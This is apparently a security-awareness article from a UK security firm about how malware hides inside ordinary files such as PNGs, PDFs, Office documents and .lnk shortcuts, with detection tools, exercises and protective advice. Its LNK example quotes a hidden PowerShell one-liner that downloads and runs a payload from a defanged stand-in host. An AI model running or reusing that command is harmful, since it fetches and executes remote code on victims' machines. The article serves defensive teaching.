A common misconception people have about malware is that it has to have a frightening name (like “virus.exe”) and sometimes the malware will have an innocent-looking name, yet will still be highly dangerous because of the code written into it.
Examples of these include:
1. A normal-looking PNG image
2. A PDF invoice
3. A Word document
4. A shortcut (.lnk) file
5. A spreadsheet
6. Even a simple text file or script
This technique is called obfuscation, steganography, polyglot files, or file format abuse. The code is deliberately concealed so antivirus misses it, users open it without suspicion, and investigators have a hard time finding the real payload.
In 2025–2026 this style of hiding is extremely common in phishing, ClickFix scams, infostealers, ransomware droppers, and supply-chain attacks.
Main Ways Malicious Code Hides in Files
1. Steganography- data is hidden secretly in images, audio and/or video files; the data is embedded into pixels of the image; or the sound and/or video from both are non-visually obvious.
2. Polyglot files- the same file physically can belong to many file types at the same time; thus, a specific file's bytes will be valid for both a PNG and a ZIP file; therefore, if the user were to attempt to view the file as an image through an associated viewer, the user would see the image through the viewer, but if a second user were to attempt to open the file using a zip utility, it would extract malware from the file.
3. Embedded scripts in documents- scripts such as VBA macros (in Microsoft Word and Excel), JavaScript (in PDF documents), or HTML smuggling (in .eml files).
4. Abuse of lnk shortcut files- lnk shortcut files can contain hidden command switches that will execute a PowerShell command or download malware if executed by double-clicking the shortcut
5. Obfuscation of PowerShell/scriptlet files- there are long base64 strings found in lnk, .hta or .sct files that will decode to malicious code when executed.
6. Metadata/alternate data streams (NTFS ADS) - malicious code can sometimes be found hidden in NTFS ADS, and therefore, if you use File Explorer to identify and open the associated file, you will not see the hidden malicious code.
Real-World Examples
Example 1: PNG + Polyglot (ClickFix style) Victim receives a WhatsApp message stating "Your invoice - open the photo to view" with a file named invoice.png.
1. Opens normally in a photo viewer as intended
2. But it is actually a valid ZIP file. (Right click on it → open with WinRAR > extract malicious .exe or .ps1 file).
3. The real-world pattern has been used in phishing groups located in the Middle East.
Example 2 : LNK Shortcut Hiding PowerShell, Email Attachment: “Report Q4.lnk” Double Clicked
1. Runs a PowerShell command in hidden mode.
2. Downloads the LummaC2 Infostealer from Attacker’s server.
3. Typical command found inside the LNK shortcut: powershell -w hidden -nop -ep bypass -c "IEX((New-Object Net.WebClient).DownloadString('hxxps://evil[.]com/payload'))"
Example 3 : PDF with Embedded JavaScript Fake invoice PDF contains JavaScript that executes upon opening via vulnerable PDF reader software.
1. Drops malware or leads to phishing web page.
2. Still functions on older versions of Adobe Reader or misconfigured browsers.
Example 4: Image Metadata Hiding Script PNG file that has an iTXt chunk of malicious JavaScript , can execute code upon being viewed in particular viewers or browsers (very rare example, but has actually occurred).
Practical Tools to Detect Hidden Code
1. ExifTool (no charge, excellent for metadata)
Exiftool suspicious.png
Look for big iTXt/zTXt chunks or odd software tags.
2. Zsteg (PNG steganography detector)
Zsteg suspicious.png
Displays concealed strings or files within LSB or palette.
3. Binwalk (extracts embedded files)
Binwalk -e suspicious.png
Extracts from ZIPs, scripts, or other payloads.
4. Olevba / Oletools (specifically for Office documents)
Olevba invoice.docm
Displays concealed VBA macros
5. Free LNK Parser / LNK Explorer tools
Open .lnk file → Displays concealed commandline
6. CyberChef (online/offline, free) Paste base64 string from file → “From Base64” → “Decode Text” → see decoded PowerShell.
7. PEiD / Detect It Easy (DIE) Detects packers/crypters in executables hidden inside polyglots.
Quick Hands-On Exercises
Exercise 1 – Check Metadata Take any photo from your phone → run
exiftool yourphoto.jpg
Write down 3 pieces of info it reveals (date, device, location).
Exercise 2 – Clean a Photo
exiftool -all= yourphoto.jpg
Compare before/after — see how much personal data disappears.
Exercise 3 – Spot Suspicious Strings Download a random .lnk file from a safe test source (or create one) → open in Notepad → look for long PowerShell strings or http URLs.
Exercise 4 – Use CyberChef Online Go to https://gchq.github.io/CyberChef Paste any base64 string you find in a suspicious file → drag “From Base64” + “Decode Text” recipes → see what it reveals.
Key Takeaways
Malware creators often place harmful codes in typical looking files (ie. Picture, PDF, Windows shortcuts, Office documents) because they are opened by the user with little to no suspicion, and because many scanners scan things like this and completely miss the hidden nasty code.
Using simple methods to protect yourself is best:
1. Don't open any unexpected files- even if it is a picture
2. Turn off auto-open for Office macros
3. Restrict changing install permission for unknown programs
4. Use antivirus that can detect scripting and bad behavior
5. If you are curious, examine files safely using ExifTool, binwalk, CyberChef- do not execute the file
February 04, 2026
February 04, 2026
February 04, 2026
February 09, 2026
October 09, 2024
October 03, 2024
© 2016 - 2026 Red Secure Tech Ltd. Registered in England and Wales under Company Number: 15581067
